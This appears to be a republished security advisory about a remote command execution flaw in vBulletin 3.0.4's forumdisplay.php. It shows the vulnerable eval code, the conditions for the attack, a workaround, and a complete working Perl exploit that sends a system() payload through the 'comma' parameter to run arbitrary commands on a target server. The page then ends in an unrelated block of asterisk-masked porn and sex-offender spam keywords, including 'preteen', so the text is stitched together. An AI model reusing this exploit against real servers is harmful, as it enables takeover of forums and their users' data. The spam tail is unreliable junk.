vBulletin forumdisplay.php Command

[Mobo]

vBulletin is "a powerful and widely used bulletin board system, based on PHP language and MySQL database".

A vulnerability in vBulletin's forumdisplay.php allows a remote attacker to cause the PHP script to execute arbitrary code via the 'comma' variable.

Vulnerable Systems:
* vBulletin version 3.0.4 and prior

Immune Systems:
* vBulletin version 3.0.5 or newer

Vulnerable code in forumdisplay.php:
if ($vboptions['showforumusers'])
{
.
.
.
.

if ($bbuserinfo['userid'])
{
...
$comma = ', ';
}
...
while ($loggedin = $DB_site->fetch_array($forumusers))
{
...
eval('$activeusers .= "' . $comma .
fetch_template('forumdisplay_loggedinuser') . '";'); <<==== (Vuln)
$comma = ', ';
...
}
...
}

Prequsites:
* $vboptions['showforumusers'] == True , the admin must set showforumusers ON in vBulletin options
* $bbuserinfo['userid'] == 0 , you must be an visitor/guest
* $DB_site->fetch_array($forumusers) == True , when you visit the forums, it must has at least one user show the forum
* magic_quotes_gpc must be OFF
* You must bypass unset($GLOBALS["$_arrykey"]) code in init.php by using: GLOBALS[]=1

Workaround:
* Disable showforumusers in vbulletin options .
* add the next line before if ($vboptions['showforumusers']) $comma = '';

Exploit:
#!/usr/bin/perl
# vbulletin 3.0.4 remote command execution by pokleyzz <pokleyzz_at_scan-associates.net>
#
# Requirement:
# showforumusers ON
#
#
# bug found by AL3NDALEEB <al3ndaleeb_at_uk2.net>
#
# usage :
# vbulletin30-xp.pl <forumdisplay.php url> <forum id> <command>
#
# example :
# vbulletin30-xp.pl http://192.168.1.78/forumdisplay.php 1 "ls -la"
#
# !! Happy Chinese new Year !!

use IO::Socket;

sub parse_url {
local($url) = @_;

if ($url =~ m#^(\w+):#) {
$protocol = $1;
$protocol =~ tr/A-Z/a-z/;
} else {
return undef;
}

if ($protocol eq "http") {
if ($url =~ m#^\s*\w+://([\w-\.]+):?(\d*)([^ \t]*)$#) {
$server = $1;
$server =~ tr/A-Z/a-z/;
$port = ($2 ne "" ? $2 : $http_port);
$path = ( $3 ? $3 : '/');
return ($protocol, $server, $port, $path);
}
return undef;
}
}

sub urlencode{
my($esc) = @_;
$esc =~ s/^\s+|\s+$//gs;
$esc =~ s/([^a-zA-Z0-9_\-.])/uc sprintf("%%%02x",ord($1))/eg;
$esc =~ s/ /\+/g;
$esc =~ s/%20/\+/g;
return $esc;
}

$url = $ARGV[0];
$fid = $ARGV[1];
$cmd = urlencode($ARGV[2]);

$http_port = 80;

$shellcode ="GLOBALS[]=1&f=$fid&cmd=$cmd&comma={\${system(\$cmd)}}{\${ex it()}}";

@target = parse_url($url);

$conn = IO::Socket::INET->new (
Proto => "tcp",
PeerAddr => $target[1],
PeerPort => $target[2],
) or die "\nUnable to connect\n";

$conn -> autoflush(1);
print $conn "GET $target[3]?$shellcode HTTP/1.1\r\nHost: $target[1]:$target[2]\r\nConnection: Close\r\n\r\n";
while (<$conn>){
print $_;
}
close $conn;

[koplionstartpohis]

real couple having *** for ***y guy *** offinders online and *** movies **** cherri henderson nicole parker ***y pics wisconsin *** oenders *** shop indianapolis hot ***y beyonce pictu passionate *** afain ***ycowgirl louisiana *** toy store ***y alcohol swimsuits housewives *** ****star dragon lily ****ed history and homo***ual **** pics of jenna jameson big black **** *** geriatric *** man **** college *** patrol *** offenders minnesota hairy ***y man purto rican **** **** movies asia argento *** clips personal***sites
angry **** ***y rachel mcadams super *** games house wife **** **** of black men girl let me *** you ****starsxtra drunk *** ***y chat cartoon one piece **** wild and ***y skinny girls ****o irish **** *** suits moms *** stories naked non **** girls candis vonebony **** s ****o vids *** with a younger man female ***ual health riley brooks **** suit gay *** free fat hardcore *** movie virginia***offendersregistr free gay ****ography ***yfemalesucking**** indianapolis preteen *** machine *** videos paris hiton *** video *** morally depraved xnxx**** vna of sus*** county n crunkand***xi pictures of naked ***y girls ***y pictures of back and white totally free **** gallery